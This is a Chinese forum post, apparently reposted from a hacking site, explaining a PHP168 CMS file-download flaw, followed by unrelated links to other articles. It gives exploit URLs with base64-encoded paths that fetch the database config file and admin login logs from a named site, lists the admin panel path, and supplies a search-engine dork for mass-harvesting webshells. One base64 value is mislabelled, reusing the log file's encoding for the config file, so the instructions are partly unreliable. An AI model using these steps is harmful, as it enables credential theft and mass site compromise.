先说明下是这个漏洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!

这个漏洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,以下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

程序后台:

http://dabei.org/admin/index.php?iframe=1

Base64加密代码:

http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

(引号里面的是Base64加密后的)

http://dabei.org//php168/mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

(引号里面的是Base64加密后的)

批量抓webshell:

google,baidu 输入关键字:Powered by PHP168

From: http://www.hack58.net/Article/html/3/62/2008/20875.htm

php168站内统计,PHP168整站系统0DAY相关推荐

  1. YzmCMS系统精仿系统下载站模板 精品系统软件整站下载站

    价值400元YzmCMS系统精仿系统下载站模板 精品系统软件下载站 采用thinkPHP框架开发 非常适合做软件,系统下载站. 网盘下载地址:https://www.skpan.cn/UwEG7Khj ...

  2. PHP整站迁移空间,discuz整站数据迁移搬家教程

    Discuz整站的数据迁移推荐使用帝国数据库备份程序! 1.首选把帝国数据库备份程序防止在网站根目录下,然后进入帝国备份程序后台,对数据库进行备份,备份完毕后,对整个网站进行打包压缩(并进行下载),或 ...

  3. 人事管理系统整站php,卡盟整站程序源码 php版

    卡盟整站源码是该网站的内核程序,内核是Ecshop,类似平台开钻之类整站程序,也是重要的源码文件,其中包含了各种源码类型文件,比较全,安装操作比较简单.卡盟整站源码是一个点卡销售/充值平台程序,可以开 ...

  4. html百度站内搜索代码,百度站内搜索如何安装 百度站内搜索代码如何部署使用...

    按照以下步骤,只需几分钟就可以完成站内搜索引擎的安装: 使用普通百度账号或百度联盟账号,均可开通站内搜索.点击此处去注册账号. 验证站点是为了证明您对该站点的所有权,您可以选择下载文件验证.html标 ...

  5. 某宝买仿互站源码直接整站打包

    自己 拿去研究 . 链接: https://pan.baidu.com/s/1tobFqq9de5OuZ8I0xZ-oKg 提取码: se9f

  6. -gMIS持续优化更新, +InSiteSearch站内搜索

    2019独角兽企业重金招聘Python工程师标准>>> -gMIS 部署和应用的场景越来越多,最近在考虑为所有gMIS承载管理的数据库系统增加一个站内搜索功能, +InSiteSea ...

  7. 站内搜索应用的方案设计的分析和总结

    http://www.poluoluo.com/jzxy/200907/63759.html 我为银杏泰克站内搜索服务商做产品顾问期间,经手了十几个站点的站内搜索应用的方案设计,略作一些分析和总结. ...

  8. ajax+lucene pdf,基于Ajax/Lucene的站内搜索技术研究

    摘要: 站内搜索引擎是找出网站重要信息的必要工具,高效的站内搜索将有助于提升网站的价值,发挥网站应有的作用.虽然现在一些网络巨头已开始研究并应用这类工具,但整个互联网行业中,受制于技术的门槛,真正的站 ...

  9. WordPress整站轻松开启HTTPS

    近两年来HTTPS取代HTTP已经成为大势所趋.早在2014年google Chromium安全团队提议将所有的HTTP协议网站标注为不安全.现在,Chrome浏览器已经开始执行这一标准了.从 Chr ...

最新文章

  1. 《电子基础与维修工具核心教程》——2.6 节点分压原理
  2. python实现WebsocketServer 服务端
  3. UITableViewCell高亮时其子视图的状态修改
  4. java中的module是什么意思_Angular - 组件中module.id的含义是什么?
  5. PHP之旅4 php 超全局变量
  6. java was datasource_mybatis默认的数据源连接池(PooledDataSource和UnPooledDataSource)
  7. 打包vue项目时报错:Expected indentation of 6 spaces but found 10
  8. php round函数输出不对_PHP第一章-变量
  9. Chrome浏览器模拟手机访问网站
  10. 最新游戏帐号交易平台源码+支持游戏币交易
  11. Tomcat8安装即配置教程
  12. 番茄时间管理法(Pomodoro Technique):一个番茄是如何让你工作更有效率的
  13. php数据库太小要怎么改,PHP入坑之 MySqli对数据库增删改查
  14. 一个博士生接受怎样的训练是完整、全面的科研训练?
  15. FPGA之JESD204B接口——总体概要 实例上
  16. 当前时间加30分钟_“尾盘30分钟”才是黄金时间,判次日涨跌!无半点偏差,字字珠玑...
  17. 逆矩阵的六个注意事项
  18. 怎么使用黑鲨U盘启动制作U盘系统?
  19. uniapp多选框组件太难用,自己手写一个它不香吗?
  20. 360数科华丽财报下的增长困局

热门文章

  1. POJ1722二维spfa+优先队列优化
  2. 如何修改markdown中图片的大小
  3. 【Groovy】集合遍历 ( 使用集合的 reverseEach 方法进行遍历 | 倒序集合迭代器 ReverseListIterator 类简介 | 代码示例 )
  4. 【Android 安装包优化】WebP 图片转换 ( 使用 iSparta 转换 WebP 图片格式 | Google 提供的 libwebp 库 )
  5. 【设计模式】装饰者模式 ( 概念 | 适用场景 | 优缺点 | 与继承对比 | 定义流程 | 运行机制 | 案例分析 )
  6. 《利用Python》进行数据分析:Numpy基础2 创建数组
  7. 【MFC】在CHtmlView中准确判断页面加载完成
  8. day36-hibernate检索和优化 02-Hibernate检索方式:简单查询及别名查询
  9. 关于清除浮动那些事儿~
  10. 微软算法100题26 左旋转字符串